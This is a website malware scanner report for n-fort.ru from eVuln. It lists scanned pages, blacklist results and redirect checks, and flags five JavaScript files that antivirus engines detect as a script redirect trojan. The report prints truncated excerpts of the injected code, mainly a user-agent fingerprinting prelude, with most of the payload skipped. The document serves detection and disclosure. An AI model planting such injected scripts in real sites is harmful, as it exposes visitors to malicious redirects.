Malware Scanner report for n-fort.ru

Malicious/Suspicious/Total urls checked: 5/0/15

5 pages have malicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "n-fort.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/8

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=n-fort.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://n-fort.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://n-fort.ru/	200 OK Content-Length: 40372 Content-Type: text/html	clean
http://n-fort.ru/plugins/system/jcemediabox/js/jcemediabox.js?v=1017	200 OK Content-Length: 44364 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) ... 3054 bytes are skipped ...tion(n,v,e,p,d,s){document.cookie=n+"="+escape(v)+((e)?"; expires="+e.toGMTString():"")+((p)?"; path="+escape(p):"")+((d)?"; domain="+d:"")+((s)?"; secure":"")},convertLegacy:function(){var t=this,each=JCEMediaBox.each,DOM=JCEMediaBox.DOM;each(DOM.select('a[href]'),function(el){if(/com_jce/.test(el.href)){var p,s,r=[];var oc=DOM.attribute('onclick');s=oc.replace(/&/g,'&').replace(/'/g,"'").split("'");p=t.params(s[0]);img=p['img']\|\|'';title=p['title']\|\|'';if(img){if(!/http:\/\ Antivirus reports: Kaspersky HEUR:Trojan.Script.Generic Sophos Troj/JSRedir-OI
http://n-fort.ru/plugins/system/jcemediabox/js/mediaobject.js?v=1017	200 OK Content-Length: 4090 Content-Type: application/x-javascript	clean
http://n-fort.ru/plugins/system/jcemediabox/addons/default.js?v=1017	200 OK Content-Length: 2785 Content-Type: application/x-javascript	clean
http://n-fort.ru/media/system/js/caption.js	200 OK Content-Length: 2932 Content-Type: application/x-javascript	clean
http://n-fort.ru/modules/mod_ppc_simple_spotlight/js/adon.js	200 OK Content-Length: 58228 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) ... 3082 bytes are skipped ...argin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]\|\|document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})(); ;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Kaspersky HEUR:Trojan.Script.Generic Sophos Troj/JSRedir-OI
http://n-fort.ru/modules/mod_ppc_simple_spotlight/js/slide.js	200 OK Content-Length: 5186 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) ... 3151 bytes are skipped ...>(curr+o.scroll > itemLength-v && o.btnNext) \|\| [] ).addClass("disabled"); } } return false; }; }); }; function css(el, prop) { return parseInt($.css(el[0], prop)) \|\| 0; }; function width(el) { return el[0].offsetWidth + css(el, 'marginLeft') + css(el, 'marginRight'); }; function height(el) { return el[0].offsetHeight + css(el, 'marginTop') + css(el, 'marginBottom'); }; })(jQuery); ;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Kaspersky HEUR:Trojan.Script.Generic Sophos Troj/JSRedir-OI
http://n-fort.ru/modules/mod_ppc_simple_spotlight/js/jquery.easing.1.1.js	200 OK Content-Length: 4263 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) ... 3218 bytes are skipped ...) { var s=1.70158; return c(t/=d)t((s+1)t - s) + b; }, backout: function(x, t, b, c, d) { var s=1.70158; return c((t=t/d-1)t((s+1)t + s) + 1) + b; }, backinout: function(x, t, b, c, d) { var s=1.70158; if ((t/=d/2) < 1) return c/2(tt(((s=(1.525))+1)t - s)) + b; return c/2((t-=2)t(((s=(1.525))+1)t + s) + 2) + b; }, linear: function(x, t, b, c, d) { return c*t/d + b; } };;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Kaspersky HEUR:Trojan.Script.Generic Sophos Troj/JSRedir-OI
http://n-fort.ru/../includes/ice/ice.js	400 Bad Request Content-Length: 172 Content-Type: text/html	clean
http://n-fort.ru/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean
http://n-fort.ru/templates/nkr/javascript/fastfont.js	200 OK Content-Length: 3285 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){function user_agentData(item){var arr=navigator.userAgent.split(' ');var browser=arr[arr.length-1];browser=browser.toLowerCase();item=item.toLowerCase();if(browser.indexOf(item)===-1){return false}else{return true}}function ListUA(){var agentList=['FreeBSD','Android','IEMobile','iPhone','BlackBerry','Maxthon','SeaMonkey','Mini','Yahoo','Mobile','Screenshot','Jasmine','Chrome','Dolphin','SiteKiosk','Macintosh','Nokia','iPad','Linux','IBrowse'];var DabList=false;for(var i in agentList) ... 1603 bytes are skipped ...== 0) return c.substring(nameEQ.length,c.length); } return null; }; window.onload = setUserOptions; function setUserOptions(){ if(!prefsLoaded){ cookie = readCookie("fontSize"); currentFontSize = cookie ? cookie : defaultFontSize; setFontSize(currentFontSize); prefsLoaded = true; } } window.onunload = saveSettings; function saveSettings() { createCookie("fontSize", currentFontSize, 365); };;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Kaspersky HEUR:Trojan.Script.Generic Sophos Troj/JSRedir-OI
http://site.yandex.net/load/form/1/form.js	200 OK Content-Length: 1293 Content-Type: application/x-javascript	clean
http://counter.rambler.ru/top100.jcn?2281067	200 OK Content-Length: 6853 Content-Type: application/x-javascript	clean
http://n-fort.ru//mc.yandex.ru/metrika/watch.js/	404 Not Found Content-Length: 1844 Content-Type: text/html	clean
http://n-fort.ru/index.php	200 OK Content-Length: 40381 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: n-fort.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 18 Jul 2014 17:06:28 GMT
Pragma: no-cache
Server: nginx/1.6.0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 18 Jul 2014 17:06:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: df76fcfcfed4ddb8a253d5890a75c480=50cbacd84f053bc5a7642e80f747eac0; path=/
X-Powered-By: PHP/5.2.17

Second query (visit from search engine):
GET / HTTP/1.1
Host: n-fort.ru
Referer: http://www.google.com/search?q=n-fort.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for n-fort.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools